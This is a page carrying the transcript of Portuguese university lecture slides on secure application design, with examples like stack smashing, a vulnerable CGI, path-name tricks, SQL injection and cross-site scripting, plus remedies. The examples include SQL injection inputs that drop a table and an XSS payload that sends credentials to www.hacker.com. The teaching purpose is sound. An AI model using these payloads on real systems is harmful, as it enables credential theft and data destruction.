Aplicações Seguras.

Tamanho: px
Começar a partir da página:

Download "Aplicações Seguras. Carlos.Ribeiro@tagus.ist.utl.pt"

Transcrição

1 Aplicações Seguras

2 Problemas de segurança Protocolos de autenticação mal desenhados. E.g. WEP, 802.1x (1º versão), PPTP, MS-CHAPv1. Protocolos de comunicação inseguros. E.g. Primeiras versões do openssl. Algoritmos de cifra inseguros. O número é tão grande quanto os critptólogos Utilização incorrecta dos sistemas. E.g. Gestão de senhas. Incumprimento da política de segurança. Incorrecta gestão dos mecanismos de autorização E.g. Ficheiros confidenciais não protegidos Incorrecto desenho e implementação das aplicações

3 Índice Exemplos de falhas de segurança comuns Interessante Técnicas de desenho e implementação seguras Importante e... um pouco chata.

4 Exemplo I: Percepção errada Um servidor de rlogin recebia pedidos de autenticação e passava-os para o programa de login local Acontece que num dos casos o programa de login aceitava logins pré-autenticados de programas em modo root, se estes lhe passassem a opção f username Se um utilizador pedisse ao rlogin para autenticar o utilizador -froot ou -fqualquernome entrava directamente. Nenhum dos programas estava errado, só não sabiam muito bem o que é que o outro fazia.

5 Exemplo II: Canais dissimulados Ficheiros.tar com partes do ficheiro de passwords. Todos os ficheiros.tar distribuídos continham partes do ficheiro de passwords O programa tar Obtinha informações do utilizador efectuando uma chamada ao sistema Criava blocos de 512K em memória e depois escrevia-os para disco. As informações do utilizador eram obtidas a partir do ficheiro passwd e escritas num buffer do heap, posteriormente libertado. Os blocos de memória utilizados pelo tar eram provenientes do heap O último bloco não era totalmente reescrito

6 Exemplo III: Protocolos É a familia de protocolos para o estabelecimento de ligações de nível 2 num meio sem fios X É um protocolo criado para autenticar ligações de nível 2 numa rede cablada A conjunção dos dois deveria dar uma ligação sem fios, de nível 2, autenticada, mas... os protocolo de autenticação (802.1X) desconhece a particularidades do protocolo de ligação (802.11) A possível enviar uma mensagem não autenticada para desligar a ligação e roubá-la.

7 Exemplo IV: Stack smashing Utilização normal Stack top void f ( int x, char * y ) { char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) ); } z (char[12]) prev frame pointer return address x (int) y (char*) f activation record (stack frame) Stack growth Stack bottom

8 Stack smashing void f ( int x, char * y ) { } { } char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) );... f ( 12345, grande demais ); g r a n d e prev frame d pointer e m areturn i address s \ grande demais Stack top buffer overflow!! Stack growth Stack bottom

9 Exemplo V : CGI em C Static char cmd[128]; Static char format[] = grep %s phone.list\n ; Int main(int argc, char *argv[]) { } Stack Overflow: Escreve por cima do endereço de retorno char buf[256]; gets(buf); sprintf(cmd, format, buf+5); syslog(36,cmd); write(1, Content-Type: text/plain\n\n 27); system(cmd); Static buffer Overflow: Escreve por cima do format Validação de entrada: buf =. /etc/passwd Validação de entrada: cmd = carlos phone.list\n \tinocêncio\t\ \t00:02:00 word secreto.doc\n \tcarlos\t\ \t00:05:00grep Zé Logfile carlos :01:31 grep carlos phone.list inocêncio :02:00 word secreto.doc carlos :05:00 grep Zé phone.list

10 Exemplo VI: Segurança baseada em Nomes de quê? nomes Ficheiros (nome e extensão) URLs Servidores (DNS) Utilizadores Muitas formas alternativas de representação de nomes. Se a validação desses nomes não for correctamente efectuada a segurança falha.

11 Segurança baseada em nomes: Então tudo se resume à correcção Pensamentos a evitar: O meu código não tem erros ; Nós já verificámos todas as entradas de dados ; Esse ataque é muito difícil, ninguém se vai dar ao trabalho ; Nós não temos esse problema: nós usamos... Etc. Cifra; firewalls; etc. Errar é humano (sabemos mas esquecemos frequentemente).

12 Windows Segurança baseada em nomes de ficheiros c:\winnt\repair\sam c:\winnt\repair\sam c:\winnt\repair\sam. c:\winnt\..\winnt\repair\sam \\?\c:\winnt\repair\sam c:\winnt\repair\sam::$data \\servername\c$\winnt\repair\sam \\?\UNC\servername\c$\winnt\repair\sam c:\program files\com1

13 Segurança baseada em nomes de URLs Todos as representações dos ficheiros (ASCII) (Escaped) (UTF-8) air/sam (UCS-2) ir/sam UCS2 fullwidth /sam (Double encoding) sam

14 Segurança baseada em nomes de Servidores & Utilizadores Servidores ribeiro ribeiro.tagus.ist.utl.pt \\ribeiro localhost \\localhost ou 127.x.x.x Utilizadores carlos ribeiro\carlos

15 Segurança baseada em nomes: O que fazer? Estar alerta para o problema. Não efectuar validações de segurança com base no nome ou extensão de ficheiros ou urls. Sempre que possível reduzir os nomes à forma canónica. Aceitar o válido rejeitar tudo o resto.

16 Segurança baseada em nomes: O cliente Os clientes também baseiam a segurança em nomes Os URLs são um caso típico Os URLs podem ser manipulados Envenenando as caches do DNS No futuro utilizando nomes visualmente iguais mas com códigos diferentes e

17 Exemplo VII: SQL Injection SQLQuery = SELECT Username FROM Users WHERE Username = & strusername & AND Password = & strpassword & strauthcheck = getqueryresult(sqlquery) If strauthcheck = Then bauthenticated = False Else bauthenticated = True End If Login: admin OR 1=1 Password: OR 1=1 SELECT Username FROM Users WHERE Username = admin OR 1=1 AND Password = OR 1=1 Login: OR 1=1 ; DROP TABLE Users -- Password: nao interessa SELECT Username FROM Users WHERE Username = OR 1=1 ; DROP TABLE Users --

18 SQL Injection: Stored Procedures SQLQuery= EXEC sp_authenticate & Username &, Password strauthcheck = getqueryresult(sqlquery) Login: admin OR 1=1 -- Password: EXEC sp_authenticate admin, OR 1=1 Falha!! Login: admin, ; DROP TABLE Users -- Password: nao interessa Ok!! EXEC sp_authenticate admin, ; DROP TABLE Users --

19 SQL Injection: O que fazer? Nem sempre os ataques são tão simples: Por vezes as queries são tão complexas que se torna difícil explorá-las. Mas... A solução é evitar o parsing das entradas pelo parser de SQL... Set cmd = CreateObject( ADOBD.Command ) cmd.command = select Username from Users where Username=? and Password=? Set parm1 = cmd.createparameter(...) parm1.value = strusername cmd.parameter.append parm1 Set parm2 = cmd.createparameter(...) parm2.value = strpassword cmd.parameter.append parm2 Set strauthcheck = cmd.execute...

20 Exemplo VIII: Cross-site scripting (XSS) Site com a falha Servidor WWW Site atacante HTTP envenenado HTTP de ataque Cliente Atacado HTTP Servidor WWW Browser

21 Cross-site scripting (XSS) Site com a falha Servidor WWW <HTML> 404 page does not exist: FILENAME.html... </HTML> Cliente Atacado Browser

22 Cross-site scripting (XSS) O meu banco Servidor WWW Login: XPTO Cliente Atacado <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login XPTO <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password >...

23 Cross-site scripting (XSS) Se em vez do username for introduzido: Bank Login: </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http//www.hacker.com/ + document.forms(1).login.value + : + document.forms(1).password.value; > <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http//www.hacker.com/ + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password >...

24 Cross-site scripting (XSS) O atacante só tem que convencer o cliente atacado a clicar num link com o seguinte aspecto: %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimage=new %20image;XSSimage.src= http//www.hacker.com/ %20%2B%20document.forms (1).login.value%20%2B%20 : %20%2B%20document.forms(1).password.value; %22%3E

25 Cross-site scripting (XSS) O problema não é dos servidores Os clientes também têm ficheiros html File://c:/mydocuments/falha.html Browsers executam script locais sem perguntar Então o que fazer?

26 Cross-site scripting (XSS): Soluções Codificar as saídas Substituir símbolos interpretados pelo HTML Ex.: < é substituído por &lt Reduzir o número de símbolos HTML a um mínimo Testar o admitido (não testar o não aceite) Não reinventar a roda Se já existe bem feito reusem

27 Desenho e Implementação

28 Como criar com segurança? Utilizar os modelos de desenho de ES Modelo de queda de água Definição de requisitos Desenho Requisitos de Segurança Análise de vulnerabilidades Testes de penetração Implementação e teste Integração e teste Operação e manutenção

29 Outros modelos Programação exploratória Não há requisitos nem desenho. Linguagem de alto nível. Prototipagem Parecido com anterior. Objectivo obter requisitos. Transformação formal Muito bom para segurança. Muito difícil. Reutilização de componentes Muitíssimo comum. Programação extrema Rápida prototipagem. Boas práticas Teste de componentes isoladamente Revisões e integração de componentes frequente. Requisitos estão aberto até ao fim

30 Testes de penetração Metodologia Flaw Hypothesis Colecção de informação Estabelecimento de hipóteses Teste de hipóteses Generalização da falha Eliminação da falha

31 Análise de vulnerabilidades Análise por módulo Análise integrada Frameworks RISOS PA (Protection Analysis) NRL Aslam s

32 RISOS Validação incompleta de entradas. E.g. Buffer overflow. Validação inconsistente dos parâmetros. E.g. Formatação inconsistente. Partilha implícita de dados confidenciais. E.g. O problema do tar Validação assíncrona. E.g. Corrida na verificação de parâmetros de uma system call Autenticação inadequada. E.g. Cavalos de troia. Limite violável. E.g. Valores muito grandes passam a negativos. Erro lógico explorável. E.g. Tratamento de condições de excepção incorrectas.

33 Conclusão Criar com segurança é o ideal. O comum é adicionar segurança depois. Os processos de certificação são mais simples no 1º caso Adopção do Common Criteria em Portugal Para quando? Certificação é um incentivo para a alteração de processos.

Aplicações Seguras. Exemplos de vulnerabilidades comuns. Carlos Ribeiro Algoritmos e Aplicações de Segurança

Aplicações Seguras. Exemplos de vulnerabilidades comuns. Carlos Ribeiro Algoritmos e Aplicações de Segurança Aplicações Seguras Exemplos de vulnerabilidades comuns 1 Exemplos de Vulnerabilidades Protocolos de autenticação mal desenhados. E.g. WEP, 802.1x (1º versão), PPTP, MS- CHAPv1. Protocolos de comunicação

Leia mais

Aplicações Seguras. Criação de aplicações seguras. Carlos Ribeiro Algoritmos e Aplicações de Segurança

Aplicações Seguras. Criação de aplicações seguras. Carlos Ribeiro Algoritmos e Aplicações de Segurança Aplicações Seguras Criação de aplicações seguras 1 Ciclo de vida da segurança Ameaças Políticas Gestão e manutenção Especificação Implementação Desenho 2 Políticas Implementação Presunções (Assumptions)

Leia mais

Análise de vulnerabilidades de um código fonte escrito em linguagem C

Análise de vulnerabilidades de um código fonte escrito em linguagem C Análise de vulnerabilidades de um código fonte escrito em linguagem C Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web As 10 mais críticas vulnerabilidades de segurança em Aplicações Web Carlos Serrão Portugal ISCTE/DCTI/Adetti/NetMuST Abril, 2009 carlos.serrao@iscte.pt carlos.j.serrao@gmail.com Copyright 2004 - The Foundation

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

Segurança na WEB Ambiente WEB estático

Segurança na WEB Ambiente WEB estático Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores

Leia mais

FAQ S Sistema de Informação da Organização do Estado (SIOE) Registar Recursos Humanos

FAQ S Sistema de Informação da Organização do Estado (SIOE) Registar Recursos Humanos FAQ S Sistema de Informação da Organização do Estado (SIOE) Registar Recursos Humanos Técnicas Junho de 2012 (data da última atualização 30/06/2012) ÍNDICE 1. Quais os pré-requisitos do posto de trabalho

Leia mais

Ataques a Aplicações Web

Ataques a Aplicações Web Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa http://www.carlosnilton.com.br/ ccorrea@unimedrj.com.br @cnacorrea Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1 Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/

Leia mais

Segurança em aplicações Web. Exemplos e Casos Práticos em

Segurança em aplicações Web. Exemplos e Casos Práticos em Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header

Leia mais

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail.

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail. Top Ten OWASP Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil farole@gmail.com Abstract.

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

HTML - 7. Vitor Vaz da Silva Paula Graça

HTML - 7. Vitor Vaz da Silva Paula Graça HTML - 7 Vitor Vaz da Silva Paula Graça 1 Formulários Os formulários forms no HTML, são utilizados para a introdução de dados de uma determinada aplicação Os programas JavaScript têm como um dos seus maiores

Leia mais

Os objetivos indicados aplicam-se a duas linguagens de programação: C e PHP

Os objetivos indicados aplicam-se a duas linguagens de programação: C e PHP AGRUPAMENTO DE ESCOLAS DE SANTA COMBA DÃO CURSO PROFISSIONAL DE TÉCNICO DE GESTÃO E PROGRAMAÇÃO DE SISTEMAS INFORMÁTICOS 2012-2015 PROGRAMAÇÃO E SISTEMAS DE INFORMAÇÃO MÓDULO 2 Mecanismos de Controlo de

Leia mais

Ajax Asynchronous JavaScript and Xml

Ajax Asynchronous JavaScript and Xml Ajax Asynchronous JavaScript and Xml Ajax permite construir aplicações Web mais interactivas, responsivas, e fáceis de usar que aplicações Web tradicionais. Numa aplicação Web tradicional quando se prime

Leia mais

Segurança em PHP. Exemplos e Casos Práticos

Segurança em PHP. Exemplos e Casos Práticos Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST 3º Ciclo de Apresentações. 17/Março/2005 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

Comunicação entre Processos Canal de comunicação Arquitetura da comunicação Modelos de comunicação

Comunicação entre Processos Canal de comunicação Arquitetura da comunicação Modelos de comunicação Comunicação entre Processos Canal de comunicação Arquitetura da comunicação Modelos de comunicação Sistemas Operativos 2015-2016 O que construímos até agora... A abstração de processo 2 A possibilidade

Leia mais

Aplicação web protegida

Aplicação web protegida Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos

Leia mais

Agrupamento Vertical de S. Lourenço - Ermesinde

Agrupamento Vertical de S. Lourenço - Ermesinde Agrupamento Vertical de S. Lourenço - Ermesinde 1 Configurações de acesso à Internet na Escola EB 2,3 de S. Lourenço Manual do Utilizador 2 Configuração para Windows Antes de iniciar os passos de configuração

Leia mais

prolider Software INSTALAÇÃO DA VERSÃO DEMO DO PROLIDER SOFTWARE COM SQL SERVER (AUTOMÁTICO).

prolider Software INSTALAÇÃO DA VERSÃO DEMO DO PROLIDER SOFTWARE COM SQL SERVER (AUTOMÁTICO). INSTALAÇÃO DA VERSÃO DEMO DO PROLIDER SOFTWARE COM SQL SERVER (AUTOMÁTICO). Antes de iniciar a instalação do Prolider Software, deverá verificar as seguintes situações: Requisitos mínimos do equipamento:

Leia mais

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia. Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)

Leia mais

Laboratório 4 Validação do Formulário

Laboratório 4 Validação do Formulário Laboratório 4 Validação do Formulário Introdução Agora que já definimos os nossos documentos usando xhtml e já os embelezámos através da utilização das CSS, está na hora de validar a informação que o utilizador

Leia mais

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com

13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com 13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro

Leia mais

GlobalPhone - Central Telefónica. Manual de Configuração do ATA SPA2102 Linksys

GlobalPhone - Central Telefónica. Manual de Configuração do ATA SPA2102 Linksys Manual de Configuração do ATA SPA2102 Linksys Indíce 1 Introdução... 3 2 Upgrade de Firmware... 3 2.1 Verificação da Versão da FW... 3 2.2 Configuração do IP Fixo sem DHCP Server... 4 2.3 Obtenção do IP

Leia mais

LIGAÇÃO à rede sem fios minedu Instruções para Window XP

LIGAÇÃO à rede sem fios minedu Instruções para Window XP LIGAÇÃO à rede sem fios minedu Instruções para Window XP (Para Windows Vista os Passos são semelhantes) Para usar a nova rede é necessário configurar uma nova ligação de rede no computador. Credenciais

Leia mais

GlobalPhone - Central Telefónica. Manual de Configuração do ATA SPA3102 Linksys

GlobalPhone - Central Telefónica. Manual de Configuração do ATA SPA3102 Linksys Manual de Configuração do ATA SPA3102 Linksys Indíce 1 Introdução... 3 2 Upgrade de Firmware... 3 2.1 Verificação da Versão da FW... 3 2.2 Configuração do IP Fixo sem DHCP Server... 4 2.3 Obtenção do IP

Leia mais

---- ECOpro ----- Manual de implementação

---- ECOpro ----- Manual de implementação ---- ECOpro ----- Manual de implementação Index Pag. PHP em IIS 7 2 Arquitectura 7 Configurar primeira entrada no ECO 11 Entrar no ECO pela primeira vez 12 Primeiros passos para configuração do ECO 13

Leia mais

Segurança em Sistemas Informáticos

Segurança em Sistemas Informáticos Segurança em Sistemas Informáticos Politicas de Segurança Quando é que se torna necessário uma política de segurança? Quando existe um Bem com Valor Se o Bem se situa permanentemente ou temporariamente

Leia mais

1 SQL Injection A consulta normal SQL seria:

1 SQL Injection A consulta normal SQL seria: HTTP Testando aplicação Web. Pegaremos dois tipos de ataques dentre os top 10 do OWASP 1 SQL Injection A consulta normal SQL seria: SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Leia mais

Internet sem fios minedu (primeira vez) Windows Vista

Internet sem fios minedu (primeira vez) Windows Vista Agrupamento de Escolas Lima-de-Faria Equipa PTE 2015/2016 CONFIGURAÇÕES DE ACESSO À REDE MINEDU Internet sem fios minedu (primeira vez) Windows Vista 1. Verificar se o computador está atualizado com o

Leia mais

Introdução ao Sistema. Características

Introdução ao Sistema. Características Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados

Leia mais

Oracle PL/SQL Overview

Oracle PL/SQL Overview Faculdades Network Oracle PL/SQL Overview Prof. Edinelson PL/SQL Linguagem de Programação Procedural Language / Structured Query Language Une o estilo modular de linguagens de programação à versatilidade

Leia mais

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

ETEC DR. EMÍLIO HENRNANDEZ AGUILAR PROGRAMAÇÃO DE COMPUTADORES II PROFESSOR RAFAEL BARRETO

ETEC DR. EMÍLIO HENRNANDEZ AGUILAR PROGRAMAÇÃO DE COMPUTADORES II PROFESSOR RAFAEL BARRETO ETEC DR. EMÍLIO HENRNANDEZ AGUILAR PROGRAMAÇÃO DE COMPUTADORES II PROFESSOR RAFAEL BARRETO DELPHI CRIANDO UMA AUTENTICAÇÃO DE USUÁRIO UTILIZANDO O COMPONENTE QUERY A autenticação de usuários serve para

Leia mais

Introdução à Programação

Introdução à Programação Aula Teórica 1b: variáveis e tipo de dados em C Departamento de Informática, UBI Variáveis: conceito e pratica Variáveis e linguagens de programação A memoria A majoria dos linguagens de programação são

Leia mais

Ajax Asynchronous JavaScript and Xml

Ajax Asynchronous JavaScript and Xml Ajax Asynchronous JavaScript and Xml Ajax permite construir aplicações Web mais interativas, responsivas, e fáceis de usar que aplicações Web tradicionais. Numa aplicação Web tradicional quando se prime

Leia mais

DSS 08/09. Camada de Dados - JDBC. Aula 1. António Nestor Ribeiro /António Ramires Fernandes/ José Creissac Campos {anr,arf,jfc}@di.uminho.

DSS 08/09. Camada de Dados - JDBC. Aula 1. António Nestor Ribeiro /António Ramires Fernandes/ José Creissac Campos {anr,arf,jfc}@di.uminho. Universidade do Minho Departamento de Informática Camada de Dados - JDBC Aula 1 António Nestor Ribeiro /António Ramires Fernandes/ José Creissac Campos {anr,arf,jfc}@di.uminho.pt 2 Camada de Dados A camada

Leia mais

Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin. Linguagem de Programação: Perl (Practical Extraction and Report Language)

Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin. Linguagem de Programação: Perl (Practical Extraction and Report Language) Author: Inj3cti0n P4ck3t Date: 13/10/10 Nome do Artigo: Desenvolvendo um scanner para Joomla Password Change Admin Contato: fer_henrick@hotmail.com Nome: Fernando Henrique Mengali de Souza Linguagem de

Leia mais

Esta fase só se configura uma única vez.

Esta fase só se configura uma única vez. Fase 0 Esta fase só se configura uma única vez. É necessário iniciar o serviço de configuração automática com fios para tal devem ser realizados os seguintes passos: No VISTA Começar por carregar em Painel

Leia mais

Instruções para instalação do SecureW2 em Windows Mobile 5.0 e 2003

Instruções para instalação do SecureW2 em Windows Mobile 5.0 e 2003 Campus de Gualtar 4710-057 Braga P Serviço de Comunicações Instruções para instalação do SecureW2 em Windows Mobile 5.0 e 2003 Requisitos: Ter instalado o ActiveSync da Microsoft no computador pessoal

Leia mais

http://www.uarte.mct.pt

http://www.uarte.mct.pt ws-ftp 1 sobre o programa...... pag.. 2 descarregar o programa a partir do site da uarte... pag.. 3 instalar o programa...... pag.. 4 a 6 iniciar o programa...... pag.. 7 interface dpo programa... pag..

Leia mais

Procedimentos para configuração em modo Router Static IP.

Procedimentos para configuração em modo Router Static IP. O equipamento DWL-G730AP tem 3 modos possíveis de configuração: Router, Access Point ou Client. Em baixo do equipamento há um chaveador para que seja efetuada a mudança de modo de configuração. Neste caso,

Leia mais

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6

Leia mais

Configuração dos portáteis utilizando os cabos de rede

Configuração dos portáteis utilizando os cabos de rede Configuração dos portáteis utilizando os cabos de rede O decréscimo do preço dos computadores portáteis originou uma subida exponencial do uso destes equipamentos. O IPCA, procurando acompanhar esta tendência,

Leia mais

Plataforma para Agentes

Plataforma para Agentes Plataforma para es JATLite - Java Template, Lite O que é o JATLite? http://java.stanford.edu/ http://www.fe.up.pt/~eol/aiad/jatlite/doc/index.html Pacote de programas em Java permitindo: rápida criação

Leia mais

Segurança da Informação:

Segurança da Informação: Segurança da Informação: Tratando dados em PHP Objetivo: O objetivo desta palestra é demonstrar os riscos inerentes de se trabalhar com informações externas à aplicações desenvolvidas em PHP, como o descuido

Leia mais

INTRODUÇÃO BUFFER OVERFLOWS

INTRODUÇÃO BUFFER OVERFLOWS BUFFER OVERFLOW INTRODUÇÃO As vulnerabilidades de buffer overflow são consideradas ameaças críticas de segurança, apesar de ser uma falha bem-conhecida e bastante séria, que se origina exclusivamente na

Leia mais

Trabalho elaborado por: Ricardo Nuno Mendão da Silva rnsilva@student.dei.uc.pt Jorge Miguel Morgado Henriques jmmh@student.dei.uc.

Trabalho elaborado por: Ricardo Nuno Mendão da Silva rnsilva@student.dei.uc.pt Jorge Miguel Morgado Henriques jmmh@student.dei.uc. Trabalho elaborado por: Ricardo Nuno Mendão da Silva rnsilva@student.dei.uc.pt Jorge Miguel Morgado Henriques jmmh@student.dei.uc.pt Contents Contents... 2 1. Introdução... 4 2. Objectivos... 5 3. Activação

Leia mais

Configuração e Partilha de Pastas / ICS

Configuração e Partilha de Pastas / ICS Configuração e Partilha de Pastas / ICS 1. Comunicação entre 2 máquinas. 1.1 Windows Xp Clicar no símbolo de rede no canto inferior direito. 1.2 Ligação área Local No separador Geral Clicar em propriedades.

Leia mais

Sistemas de Telecomunicações

Sistemas de Telecomunicações Departamento de Engenharia Electrotécnica Sistemas de Telecomunicações 2014/2015 Trabalho 1: Aplicação sobre sockets procurador web Mestrado integrado em Engenharia Eletrotécnica e de Computadores http://tele1.dee.fct.unl.pt

Leia mais

UNIVERSIDADE CATÓLICA PORTUGUESA

UNIVERSIDADE CATÓLICA PORTUGUESA UNIVERSIDADE CATÓLICA PORTUGUESA WebShare Serviço de partilha de ficheiros via WebDAV versão: 2.0.3 Nelson Rodrigues Direcção de Sistemas de Informação 28-10-2010 ÍNDICE: Introdução... 3 Requisitos...

Leia mais

SIMEC Sistema Integrado de Planejamento, Orçamento e Finanças

SIMEC Sistema Integrado de Planejamento, Orçamento e Finanças SIMEC Sistema Integrado de Planejamento, Orçamento e Finanças Versão 1.0 Sumário Introdução... 3 1. Estrutura da aplicação... 4 1.1 Diretórios e arquivos... 4 2. Configuração do ambiente...

Leia mais

Sistemas Operativos I

Sistemas Operativos I Componentes de um Sistema Operativo Maria João Viamonte / Luis Lino Ferreira Fevereiro de 2006 Sistema Operativo Um Sistema Operativo pode ser visto como um programa de grande complexidade, responsável

Leia mais

Quick Reference. Configuração do acesso Wireless para a Rede da Escola

Quick Reference. Configuração do acesso Wireless para a Rede da Escola Quick Reference Configuração do acesso Wireless para a Rede da Escola PT Comunicações, S. A. Rua Andrade Corvo, nº 6 1050-000 Lisboa Portugal Tel: (351) 21 500 20 00 Pagina 1 de 14 Índice 1. Configuração

Leia mais

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com (In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades

Leia mais

Algumas informações sobre a rede informática do ISA

Algumas informações sobre a rede informática do ISA Algumas informações sobre a rede informática do ISA Fernanda Valente Graça Abrantes A grande maioria dos computadores do Instituto Superior de Agronomia estão ligados entre si constituindo uma Intranet,

Leia mais

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com SQL Procedural Josino Rodrigues Neto josinon@gmail.com SQL Procedural Agregada em SQL-92 As ferramentas têm nomes para suas linguagens SQL procedurais/embutidas Oracle : PL/SQL Postgres PL/Pgsql SQL Server

Leia mais

MANUAL DO UTILIZADOR DE REDE

MANUAL DO UTILIZADOR DE REDE MANUAL DO UTILIZADOR DE REDE Guardar o registo de impressão na rede Versão 0 POR Definições de notas Ao longo do Manual do utilizador, é utilizado o seguinte ícone: Notas sobre como enfrentar situações

Leia mais

ZS Rest. Manual Avançado. Instalação em Rede. v2011

ZS Rest. Manual Avançado. Instalação em Rede. v2011 Manual Avançado Instalação em Rede v2011 1 1. Índice 2. Introdução... 2 3. Hardware... 3 b) Servidor:... 3 c) Rede:... 3 d) Pontos de Venda... 4 4. SQL Server... 5 e) Configurar porta estática:... 5 5.

Leia mais

